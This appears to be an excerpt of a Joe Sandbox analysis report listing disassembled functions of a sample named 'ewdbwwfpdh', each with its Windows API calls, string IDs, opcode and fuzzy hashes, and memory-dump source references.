                                                                                                    • Instruction ID: add8bf2a3ec438f2f51dde7cfd56d6ab97720ba38e2333ec88ac1f1cd5ecf6dd
                                                                                                    • Opcode Fuzzy Hash: 6af71a6eb53714bae9577f4df527294dded3c59e22f834fcb24672fa49808ed0
                                                                                                    • Instruction Fuzzy Hash: 9DE01AB4801301DFCB50AFA0A80CB6DBBF5FB08310F11C449E81AE3211CB3A99419F00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001CEBEA Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 001CEBEA
                                                                                                    • GetDC.USER32(00000000), ref: 001CEBF4
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001CEC00
                                                                                                    • ReleaseDC.USER32(?), ref: 001CEC21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: 315925836105eed1ca06497967adef9effe336047438aafe8baf0074222529b7
                                                                                                    • Instruction ID: 1702efed3f55174de5e53612be78e6314000490e6daa1f11aa1538bb28758b3c
                                                                                                    • Opcode Fuzzy Hash: 315925836105eed1ca06497967adef9effe336047438aafe8baf0074222529b7
                                                                                                    • Instruction Fuzzy Hash: 44E092B5901305EFCB51AFA0A84CA6DBBF9BB48311F158449E95EE3251DB3A9A019F10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0019E60D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 0019E69D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                    • Opcode ID: 4efb117856f7dd8909407a748f80572d6259840be5d45b8526f06aee72b3dd77
                                                                                                    • Instruction ID: d31201582e566e4177b347f5677c5c40c8b9029c7501360c95b1c12e44fec95a
                                                                                                    • Opcode Fuzzy Hash: 4efb117856f7dd8909407a748f80572d6259840be5d45b8526f06aee72b3dd77
                                                                                                    • Instruction Fuzzy Hash: 94516965E082019ACF15F714DD053BA3BE4AB72B40F308969F095822E9EF358CD6DA86
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0018A86C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #
                                                                                                    • API String ID: 0-1885708031
                                                                                                    • Opcode ID: 822c997bc203548cfcc985c6ddb28740a08466df00dd4af863d68fd189b788c3
                                                                                                    • Instruction ID: 75c56b165b06234826e20f179ed2723692d268eb422c01ccc468285bb6e5e600
                                                                                                    • Opcode Fuzzy Hash: 822c997bc203548cfcc985c6ddb28740a08466df00dd4af863d68fd189b788c3
                                                                                                    • Instruction Fuzzy Hash: 69514430908246DFDF18EF68D080BBA7BA1EF25314F65405AE8919B2D0DB30DE42CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F60A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                    • String ID: CALLARGARRAY
                                                                                                    • API String ID: 157775604-1150593374
                                                                                                    • Opcode ID: d985d150987a4f2cf6e6208556901533cd80a7ac3ed3616f14faa9dc1f69870d
                                                                                                    • Instruction ID: ab813791fdf921bb06e924c18fe81633b00b5aab90c627134ca0bee7311c5f82
                                                                                                    • Opcode Fuzzy Hash: d985d150987a4f2cf6e6208556901533cd80a7ac3ed3616f14faa9dc1f69870d
                                                                                                    • Instruction Fuzzy Hash: E841A471A042199FCB14EFA8C8958FEBBF5FFA9320F144069E506A7352EB709D81CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0020406F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00177759
                                                                                                      • Part of subcall function 0017771B: GetStockObject.GDI32(00000011), ref: 0017776D
                                                                                                      • Part of subcall function 0017771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00177777
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002040D9
                                                                                                    • GetSysColor.USER32(00000012), ref: 002040F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                    • String ID: static
                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                    • Opcode ID: 94b8336065e36ae9440ac2676be813349940b3188131c811974f1d9e47adc625
                                                                                                    • Instruction ID: 41ca02075c78654ff1d32239a9bc3d728e39d43342ee68555d85bb4d4d1addc1
                                                                                                    • Opcode Fuzzy Hash: 94b8336065e36ae9440ac2676be813349940b3188131c811974f1d9e47adc625
                                                                                                    • Instruction Fuzzy Hash: 06113A7262020AAFDB00DFA8DC45AFA7BB9FB09314F004915FE59E3191E775E861DB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D256E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001D25DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    • Opcode ID: 8344ea27e5a1af4c27a199a8615ad7a211cbf3d76a1ed2b93ff023b7db030711
                                                                                                    • Instruction ID: ad28a1706e778f4e93e599d502c527d8933941b58d26ccad5cc95aa5f7072ffd
                                                                                                    • Opcode Fuzzy Hash: 8344ea27e5a1af4c27a199a8615ad7a211cbf3d76a1ed2b93ff023b7db030711
                                                                                                    • Instruction Fuzzy Hash: F4012871605215ABCB14EBA4DC55DFE7779BF72320B04460AF872933D3EB3098088750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D2468 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 001D24D6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    • Opcode ID: 27e705100c8879805857d1c453a665c295b15e5f68a26c4eabe9706217bf9874
                                                                                                    • Instruction ID: 29333a5b415bafbca7c86c565733e37ed55e68f3a46b34463dda505419a7c702
                                                                                                    • Opcode Fuzzy Hash: 27e705100c8879805857d1c453a665c295b15e5f68a26c4eabe9706217bf9874
                                                                                                    • Instruction Fuzzy Hash: 3901F771A05109ABCB28EBA0C855FFF77B89F71304F14001AA81263383DB209E08C671
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D24EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 001D2558
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    • Opcode ID: f2c78b48f6cf24975a71eeb05e95cfeabda6ad0ae0a1858766e40b74afe142a1
                                                                                                    • Instruction ID: 3e043640f34bdf4ad6d51d47562e4d29ab7ff8ecd7b64194f3f44b3b1c130661
                                                                                                    • Opcode Fuzzy Hash: f2c78b48f6cf24975a71eeb05e95cfeabda6ad0ae0a1858766e40b74afe142a1
                                                                                                    • Instruction Fuzzy Hash: 2D01A271A45109A7CB24EBA4E956FFEB7B89F32740F144016B812B3382EB349E09C671
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D25F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 001D2663
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    • Opcode ID: 451a3727b55ad8a28a7ba1ae1098877390d0a232b4e290e898ebc8975e798c59
                                                                                                    • Instruction ID: 9eaf4d67dceb042c231dbc716803149ff06755b463a7560a04e73288ca12a446
                                                                                                    • Opcode Fuzzy Hash: 451a3727b55ad8a28a7ba1ae1098877390d0a232b4e290e898ebc8975e798c59
                                                                                                    • Instruction Fuzzy Hash: BCF0A471A45219A7CB24E7A4DC96FFFB778AF21714F140916F872A33D3DB70A8098660
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00208AD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00244018,0024405C), ref: 00208B1E
                                                                                                    • CloseHandle.KERNEL32 ref: 00208B30
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                    • String ID: \@$
                                                                                                    • API String ID: 3712363035-1453171986
                                                                                                    • Opcode ID: d995ffc4547f23ac5369128e01dc19bee914c08b91aa58ac0a56542c9fd36f67
                                                                                                    • Instruction ID: 8ce75f9142ced504910dd3335fac97999f223b8be60126a0f61832ac98ee0efb
                                                                                                    • Opcode Fuzzy Hash: d995ffc4547f23ac5369128e01dc19bee914c08b91aa58ac0a56542c9fd36f67
                                                                                                    • Instruction Fuzzy Hash: 1EF05EB6551304BBE7247BA0BC49FB73A9CDB16754F001020FB08D6192D6764C6096B8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001CE59A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime
                                                                                                    • String ID: %.3d$X64
                                                                                                    • API String ID: 481472006-1077770165
                                                                                                    • Opcode ID: 698d62deb08e4d421115c15ce99af133a9d6d72a688bf229d8dfd5ffb96411a5
                                                                                                    • Instruction ID: 82489295d1c676d57f59c6c818e1299da6907c18da53d64d4e64e91c29decec8
                                                                                                    • Opcode Fuzzy Hash: 698d62deb08e4d421115c15ce99af133a9d6d72a688bf229d8dfd5ffb96411a5
                                                                                                    • Instruction Fuzzy Hash: F5D012A5C14118D9CB94AAD09848DBD73FCA72C300F21445AF806D1001E734D658AB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00202CB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00202CCB
                                                                                                    • PostMessageW.USER32(00000000), ref: 00202CD2
                                                                                                      • Part of subcall function 001DF1A7: Sleep.KERNEL32 ref: 001DF21F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 529655941-2988720461
                                                                                                    • Opcode ID: 421c32ce2d6b6192714f7b7d2a9395083fe41a0646209cba06aa49fb619731fc
                                                                                                    • Instruction ID: dead3ff022245ff6ec466a9e4e1d110b5847ba97fc576573a490e8977df729b5
                                                                                                    • Opcode Fuzzy Hash: 421c32ce2d6b6192714f7b7d2a9395083fe41a0646209cba06aa49fb619731fc
                                                                                                    • Instruction Fuzzy Hash: 1FD0C9753C63506AF668B7B0FC4FFC6AA58AB55B14F4009167646AA1D1CAA0A802C698
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00202C81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00202C8B
                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00202C9E
                                                                                                      • Part of subcall function 001DF1A7: Sleep.KERNEL32 ref: 001DF21F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 529655941-2988720461
                                                                                                    • Opcode ID: 7c405550ee20625e62221045de143967794bf4dbfb934601931135d8913473a0
                                                                                                    • Instruction ID: 562d63ce7a215f8f152c374470579b6816cfd7ef2313886da4a52e13c4306dd5
                                                                                                    • Opcode Fuzzy Hash: 7c405550ee20625e62221045de143967794bf4dbfb934601931135d8913473a0
                                                                                                    • Instruction Fuzzy Hash: 94D0C9753D5350A6F668B7B0FC4FFD6AA58AB50B14F400916764AAA1D1CAA0A802C694
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001AC19D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 001AC233
                                                                                                    • GetLastError.KERNEL32 ref: 001AC241
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001AC29C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1717984340-0
                                                                                                    • Opcode ID: 9471b0f442f56135446d5ebc43cc5cfc8eea597cec44dd5ffccdc16cfdf7399a
                                                                                                    • Instruction ID: e870f34cf07fb182146e0e46de4f6e1865a6d1b90bf43f71ca65f00fc6c30d33
                                                                                                    • Opcode Fuzzy Hash: 9471b0f442f56135446d5ebc43cc5cfc8eea597cec44dd5ffccdc16cfdf7399a
                                                                                                    • Instruction Fuzzy Hash: 2041C939600206EFCF258FE9D844BBA7BA5EF57720F25416AF859AB1A1DB308D01C7D0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%